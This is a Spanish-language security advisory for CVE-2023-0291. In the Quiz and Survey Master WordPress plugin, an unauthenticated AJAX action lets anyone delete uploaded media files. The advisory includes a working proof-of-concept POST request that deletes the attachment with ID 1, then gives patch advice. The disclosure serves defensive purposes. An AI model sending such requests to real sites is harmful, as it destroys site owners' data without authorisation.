Vulnerabilidad permite eliminar archivos multimedia en WordPress (CVE-2023-0291)

INTRODUCCIÓN

Quiz and Survey Master es el plugin de WordPress más fácil de usar que se puede utilizar para crear contenido atractivo para dirigir el tráfico y aumentar la participación de los usuarios (en palabras del vendedor). La vulnerabilidad descubierta por la investigadora Julia Ahrens de RCE Security permite a los atacantes eliminar todos los archivos multimedia de WordPress cargados. Puntuación CVSS: 7,5

ANÁLISIS

El plugin ofrece la acción ajax "qsm_remove_file_fd_question" a usuarios no autenticados la cual acepta un parámetro "media_id" que apunta a cualquier elemento subido a través de la funcionalidad de carga de archivos multimedia de WordPress. Sin embargo, este "media_id" se utiliza después en una llamada forzada a wp_delete_attachment() que elimina los archivos multimedia de WordPress.

Un exploit exitoso puede permitir a un atacante no autenticado borrar cualquier (y todos) los archivos multimedia subidos a WordPress.

La siguiente prueba de concepto eliminaría los archivos multimedia subidos con el ID "1":

POST /wp-admin/admin-ajax.php HTTP/2
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1

Versiones afectadas:

• Quiz And Survey Master 8.0.8 y versiones inferiores

RECOMENDACIONES

Actualizar a la versión 8.0.9

REFERENCIAS

https://securityonline.info/cve-2023-0291-allows-attackers-to-delete-all-uploaded-wordpress-media-files/
https://seclists.org/fulldisclosure/2023/Feb/2
https://github.com/MrTuxracer/advisories